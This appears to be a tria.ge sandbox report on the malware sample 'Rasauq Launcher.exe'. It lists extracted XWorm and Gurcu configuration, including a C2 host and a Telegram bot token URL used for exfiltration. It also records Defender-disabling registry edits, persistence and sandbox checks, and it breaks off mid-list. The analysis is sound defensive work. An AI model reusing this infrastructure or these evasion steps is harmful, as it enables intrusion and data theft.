Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
297s -
max time network
299s -
platform
windows10-ltsc_2021_x64 -
resource
win10ltsc2021-20250314-en -
resource tags
arch:x64arch:x86image:win10ltsc2021-20250314-enlocale:en-usos:windows10-ltsc_2021-x64system -
submitted
17/03/2025, 15:22
Static task
static1
Behavioral task
behavioral1
Sample
Rasauq Launcher.exe
Resource
win10v2004-20250314-en
Behavioral task
behavioral2
Sample
Rasauq Launcher.exe
Resource
win10ltsc2021-20250314-en
Behavioral task
behavioral3
Sample
Rasauq Launcher.exe
Resource
win11-20250314-en
General
-
Target
Rasauq Launcher.exe
-
Size
84KB
-
MD5
569a09ebfa64b8f5ec39a17c2b3bc4dd
-
SHA1
1d2b2b9c024f2e204ab0b4bbba9a6c305038d487
-
SHA256
9fc53dcefce749b23c8f907dc44d498d15058a5b2cedb7c94e1cd42c88176c2f
-
SHA512
960af03f64621beda154dc986cb80d3370f11cb1fe846bc91ec8ba6782dd71dba229926ef2fea0fec208713e6b5af07912ca1045c40fe5c246dd6377529ee01b
-
SSDEEP
1536:l5e2sHTvN2b4p98BcYCXSg0qMl3nRgt5P7ZJUqAA/WkywGKwkvOWkDDiun:q2W0n4lEl3RE5veV2Wniun
Malware Config
Extracted
xworm
looking-brings.gl.at.ply.gg:65381
-
Install_directory
%LocalAppData%
-
install_file
USB.exe
-
telegram
https://api.telegram.org/bot8074871433:AAGd-vCZQOlCC_n2SUFT-qQ6fFThcBVDd1Y
Extracted
gurcu
https://api.telegram.org/bot8074871433:AAGd-vCZQOlCC_n2SUFT-qQ6fFThcBVDd1Y/sendMessage?chat_id=1002422094535
Signatures
-
Contains code to disable Windows Defender 1 IoCs
A .NET executable tasked with disabling Windows Defender capabilities such as realtime monitoring, blocking at first seen, etc.
resource yara_rule behavioral2/files/0x000700000002823b-46.dat disable_win_def -
Detect Xworm Payload 2 IoCs
resource yara_rule behavioral2/files/0x0008000000028232-6.dat family_xworm behavioral2/memory/3056-38-0x0000000000DB0000-0x0000000000DCA000-memory.dmp family_xworm -
Disables service(s) 3 TTPs
-
Gurcu family
-
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\DisableAntiSpyware = "1" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\DisableAntiSpyware = "1" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\DisableAntiSpyware = "1" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\DisableAntiSpyware = "1" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\DisableAntiSpyware = "1" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\DisableAntiSpyware = "1" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\DisableAntiSpyware = "1" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\DisableAntiSpyware = "1" reg.exe -
Modifies security service 2 TTPs 5 IoCs
description ioc Process Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WinDefend\Start = "4" reg.exe Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\mpssvc\Start = "4" reg.exe Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WinDefend\Start = "4" reg.exe Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\mpssvc\Start = "4" reg.exe Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WinDefend\Security reg.exe -
Xworm family
-
Modifies boot configuration data using bcdedit 1 TTPs 4 IoCs
pid Process 5468 bcdedit.exe 6076 bcdedit.exe 5476 bcdedit.exe 2096 bcdedit.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 17 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
pid Process 1868 powershell.exe 4940 powershell.exe 240 powershell.exe 412 powershell.exe 5056 powershell.exe 2648 powershell.exe 6088 powershell.exe 4048 powershell.exe 5372 powershell.exe 3028 powershell.exe 5436 powershell.exe 5336 powershell.exe 4400 powershell.exe 2044 powershell.exe 2600 powershell.exe 2892 powershell.exe 3448 powershell.exe -
Disables RegEdit via registry modification 1 IoCs
description ioc Process Set value (int) \REGISTRY\USER\S-1-5-21-2123103809-19148277-2527443841-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools = "1" reg.exe -
Disables Task Manager via registry modification
-
Drops file in Drivers directory 2 IoCs
description ioc Process File opened for modification C:\Windows\System32\drivers\etc\hosts cmd.exe File opened for modification C:\Windows\System32\drivers\etc\hosts cmd.exe -
Manipulates Digital Signatures 1 TTPs 11 IoCs
Attackers can apply techniques such as changing the registry keys of authenticode & Cryptography to obtain their binary as valid.
description ioc Process Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing\Software\Rasauq on top\ reg.exe Set value (str) \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing\Software\Rasauq on top\ reg.exe Set value (str) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing\Software\Rasauq on top\ reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-2123103809-19148277-2527443841-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing\Software\Rasauq on top\ reg.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing\Software\Rasauq on top\ reg.exe Set value (str) \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing\Software\Rasauq on top\ reg.exe Set value (str) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing\Software\Rasauq on top\ reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-2123103809-19148277-2527443841-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing\Software\Rasauq on top\ reg.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing\Software\Rasauq on top\ reg.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing\Software\Rasauq on top\ reg.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing\Software\Software\Rasauq on top\ reg.exe -
Modifies Windows Firewall 2 TTPs 2 IoCs
pid Process 3516 netsh.exe 6044 netsh.exe -
Possible privilege escalation attempt 32 IoCs
pid Process 2744 icacls.exe 2504 takeown.exe 6008 icacls.exe 5528 icacls.exe 6088 icacls.exe 5320 takeown.exe 2152 icacls.exe 2396 icacls.exe 6092 takeown.exe 5512 takeown.exe 2648 icacls.exe 3764 takeown.exe 5056 takeown.exe 5956 icacls.exe 3328 icacls.exe 5052 takeown.exe 1516 icacls.exe 3744 takeown.exe 4988 takeown.exe 4192 takeown.exe 4216 takeown.exe 4268 takeown.exe 3348 takeown.exe 1032 icacls.exe 3916 icacls.exe 6060 takeown.exe 1272 takeown.exe 2804 takeown.exe 6068 takeown.exe 5284 takeown.exe 5692 icacls.exe 4932 icacls.exe -
Sets file to hidden 1 TTPs 2 IoCs
Modifies file attributes to stop it showing in Explorer etc.
pid Process 2112 attrib.exe 4316 attrib.exe -
Stops running service(s) 4 TTPs
-
Checks computer location settings 2 TTPs 4 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-2123103809-19148277-2527443841-1000\Control Panel\International\Geo\Nation Rasauq Launcher.exe Key value queried \REGISTRY\USER\S-1-5-21-2123103809-19148277-2527443841-1000\Control Panel\International\Geo\Nation Rasauq SoftWorks.exe Key value queried \REGISTRY\USER\S-1-5-21-2123103809-19148277-2527443841-1000\Control Panel\International\Geo\Nation sRasauq SoftWorks.exe Key value queried \REGISTRY\USER\S-1-5-21-2123103809-19148277-2527443841-1000\Control Panel\International\Geo\Nation $77RealtekAudioDriverHost.exe -
Drops startup file 6 IoCs
description ioc Process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\hig.bat cmd.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\hig.bat cmd.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Windows Host Service.lnk Rasauq SoftWorks.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Windows Host Service.lnk Rasauq SoftWorks.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ModMenu.bat cmd.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ModMenu.bat cmd.exe -
Executes dropped EXE 3 IoCs
pid Process 3056 Rasauq SoftWorks.exe 2324 sRasauq SoftWorks.exe 1464 $77RealtekAudioDriverHost.exe -
Modifies file permissions 1 TTPs 32 IoCs
pid Process 2744 icacls.exe 4988 takeown.exe 4192 takeown.exe 2804 takeown.exe 1516 icacls.exe 2152 icacls.exe 1272 takeown.exe 3328 icacls.exe 5056 takeown.exe 5320 takeown.exe 2504 takeown.exe 3348 takeown.exe 5692 icacls.exe 4932 icacls.exe 6060 takeown.exe 3916 icacls.exe 6068 takeown.exe 5956 icacls.exe 6088 icacls.exe 1032 icacls.exe 2396 icacls.exe 4268 takeown.exe 3764 takeown.exe 5052 takeown.exe 5512 takeown.exe 2648 icacls.exe 4216 takeown.exe 6092 takeown.exe 3744 takeown.exe 6008 icacls.exe 5284 takeown.exe 5528 icacls.exe -
Adds Run key to start application 2 TTPs 5 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-2123103809-19148277-2527443841-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\RasauqRemover = "\"\"" reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-2123103809-19148277-2527443841-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Windows Service reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-2123103809-19148277-2527443841-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\RasauqRemover = "\"\"" reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-2123103809-19148277-2527443841-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Windows Host Service = "C:\\Users\\Admin\\AppData\\Local\\Windows Host Service.scr" Rasauq SoftWorks.exe Set value (str) \REGISTRY\USER\S-1-5-21-2123103809-19148277-2527443841-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Windows Service reg.exe -
File and Directory Permissions Modification: Windows File and Directory Permissions Modification 1 TTPs
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
flow ioc 117 discord.com 118 discord.com -
Power Settings 1 TTPs 12 IoCs
powercfg controls all configurable power system settings on a Windows system and can be abused to prevent an infected host from locking or shutting down.
pid Process 2152 powercfg.exe 2440 powercfg.exe 4128 powercfg.exe 3024 powercfg.exe 5368 powercfg.exe 5944 powercfg.exe 3132 powercfg.exe 2532 powercfg.exe 1032 powercfg.exe 3936 powercfg.exe 308 powercfg.exe 4080 powercfg.exe -
Drops file in System32 directory 8 IoCs
description ioc Process File created C:\Windows\System32\$666-RasauqBroker.bat cmd.exe File opened for modification C:\Windows\System32\$666-RasauqBroker.bat cmd.exe File opened for modification C:\Windows\System32\Rasauq\$77RasauqBroker.bat cmd.exe File opened for modification C:\Windows\System32\Rasauq\$77RasauqBroker.bat cmd.exe File opened for modification C:\Windows\system32\Recovery\ReAgent.xml ReAgentc.exe File opened for modification C:\Windows\System32\$666-RasauqBroker.bat cmd.exe File created C:\Windows\System32\Rasauq\$77RasauqBroker.bat cmd.exe File opened for modification C:\Windows\system32\Recovery ReAgentc.exe -
Sets desktop wallpaper using registry 2 TTPs 2 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-2123103809-19148277-2527443841-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\IMG_3728.png" reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-2123103809-19148277-2527443841-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\IMG_3728.png" reg.exe -
Drops file in Program Files directory 8 IoCs
description ioc Process File opened for modification C:\Program Files\Windows Defender\MpClient.dll cmd.exe File opened for modification C:\Program Files\Windows Defender\MsMpCom.dll cmd.exe File opened for modification C:\Program Files\Windows Defender\ProtectionManagement.dll cmd.exe File opened for modification C:\Program Files\Windows Defender\en-US\ProtectionManagement.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\MpClient.dll cmd.exe File opened for modification C:\Program Files\Windows Defender\MsMpCom.dll cmd.exe File opened for modification C:\Program Files\Windows Defender\ProtectionManagement.dll cmd.exe File opened for modification C:\Program Files\Windows Defender\en-US\ProtectionManagement.dll.mui cmd.exe -
Drops file in Windows directory 9 IoCs
description ioc Process File opened for modification C:\Windows\Panther\UnattendGC\diagwrn.xml ReAgentc.exe File opened for modification C:\Windows\Logs\ReAgent\ReAgent.log ReAgentc.exe File opened for modification C:\Windows\Panther\UnattendGC\diagerr.xml ReAgentc.exe File opened for modification C:\Windows\Logs\ReAgent\ReAgent.log ReAgentc.exe File opened for modification C:\Windows\Panther\UnattendGC\diagerr.xml ReAgentc.exe File opened for modification C:\Windows\Panther\UnattendGC\setuperr.log ReAgentc.exe File opened for modification C:\Windows\Panther\UnattendGC\diagwrn.xml ReAgentc.exe File opened for modification C:\Windows\SystemTemp msedge.exe File opened for modification C:\Windows\Panther\UnattendGC\setuperr.log ReAgentc.exe -
Launches sc.exe 64 IoCs
Sc.exe is a Windows utlilty to control services on the system.
pid Process 1720 sc.exe 3448 sc.exe 4880 sc.exe 856 sc.exe 5496 sc.exe 6064 sc.exe 2468 sc.exe 5416 sc.exe 5864 sc.exe 1308 sc.exe 4992 sc.exe 1096 sc.exe 4304 sc.exe 1172 sc.exe 2840 sc.exe 2724 sc.exe 4364 sc.exe 2976 sc.exe 3088 sc.exe 1260 sc.exe 2396 sc.exe 4056 sc.exe 3832 sc.exe 644 sc.exe 4436 sc.exe 3008 sc.exe 3588 sc.exe 6136 sc.exe 6044 sc.exe 1032 sc.exe 480 sc.exe 1988 sc.exe 3808 sc.exe 5028 sc.exe 2600 sc.exe 1712 sc.exe 5384 sc.exe 296 sc.exe 3104 sc.exe 4292 sc.exe 5576 sc.exe 2868 sc.exe 5140 sc.exe 3580 sc.exe 3924 sc.exe 3568 sc.exe 3012 sc.exe 60 sc.exe 3632 sc.exe 3704 sc.exe 4768 sc.exe 924 sc.exe 2372 sc.exe 5692 sc.exe 4164 sc.exe 1140 sc.exe 1656 sc.exe 4196 sc.exe 5076 sc.exe 3780 sc.exe 3004 sc.exe 3732 sc.exe 3452 sc.exe 4604 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Event Triggered Execution: Netsh Helper DLL 1 TTPs 6 IoCs
Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.
description ioc Process Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe -
Checks SCSI registry key(s) 3 TTPs 64 IoCs
SCSI information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\HardwareID powercfg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0100 powercfg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000 powercfg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0100 powercfg.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\HardwareID powercfg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{4340a6c5-93fa-4706-972c-7b648008a5a7}\0002 powercfg.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\FriendlyName powercfg.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\DeviceDesc powercfg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0100 powercfg.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\DeviceDesc powercfg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{4340a6c5-93fa-4706-972c-7b648008a5a7}\0002 powercfg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{a45c254e-df1c-4efd-8020-67d146a850e0}\000E powercfg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{a45c254e-df1c-4efd-8020-67d146a850e0}\0003 powercfg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{a45c254e-df1c-4efd-8020-67d146a850e0}\000E powercfg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0100 powercfg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{a45c254e-df1c-4efd-8020-67d146a850e0}\000E powercfg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{a45c254e-df1c-4efd-8020-67d146a850e0}\0020 powercfg.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\FriendlyName powercfg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0100 powercfg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{a45c254e-df1c-4efd-8020-67d146a850e0}\0003 powercfg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{a45c254e-df1c-4efd-8020-67d146a850e0}\0003 powercfg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001 powercfg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{4340a6c5-93fa-4706-972c-7b648008a5a7}\0002 powercfg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{a45c254e-df1c-4efd-8020-67d146a850e0}\0003 powercfg.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\FriendlyName powercfg.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\DeviceDesc powercfg.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\DeviceDesc powercfg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{a45c254e-df1c-4efd-8020-67d146a850e0}\0002 powercfg.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\HardwareID powercfg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{a45c254e-df1c-4efd-8020-67d146a850e0}\0020 powercfg.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\DeviceDesc powercfg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{4340a6c5-93fa-4706-972c-7b648008a5a7}\0002 powercfg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{4340a6c5-93fa-4706-972c-7b648008a5a7}\0002 powercfg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{a45c254e-df1c-4efd-8020-67d146a850e0}\0002 powercfg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0100 powercfg.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\DeviceDesc powercfg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0100 powercfg.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\HardwareID powercfg.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\DeviceDesc powercfg.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\HardwareID powercfg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{a45c254e-df1c-4efd-8020-67d146a850e0}\0002 powercfg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{a45c254e-df1c-4efd-8020-67d146a850e0}\0002 powercfg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{a45c254e-df1c-4efd-8020-67d146a850e0}\0002 powercfg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000 powercfg.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\HardwareID powercfg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{a45c254e-df1c-4efd-8020-67d146a850e0}\0003 powercfg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{a45c254e-df1c-4efd-8020-67d146a850e0}\0003 powercfg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0100 powercfg.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\FriendlyName powercfg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{a45c254e-df1c-4efd-8020-67d146a850e0}\0003 powercfg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{a45c254e-df1c-4efd-8020-67d146a850e0}\000E powercfg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{a45c254e-df1c-4efd-8020-67d146a850e0}\0020 powercfg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{a45c254e-df1c-4efd-8020-67d146a850e0}\0002 powercfg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0100 powercfg.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\FriendlyName powercfg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{a45c254e-df1c-4efd-8020-67d146a850e0}\0003 powercfg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000 powercfg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{a45c254e-df1c-4efd-8020-67d146a850e0}\000E powercfg.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\HardwareID powercfg.exe Key value queried 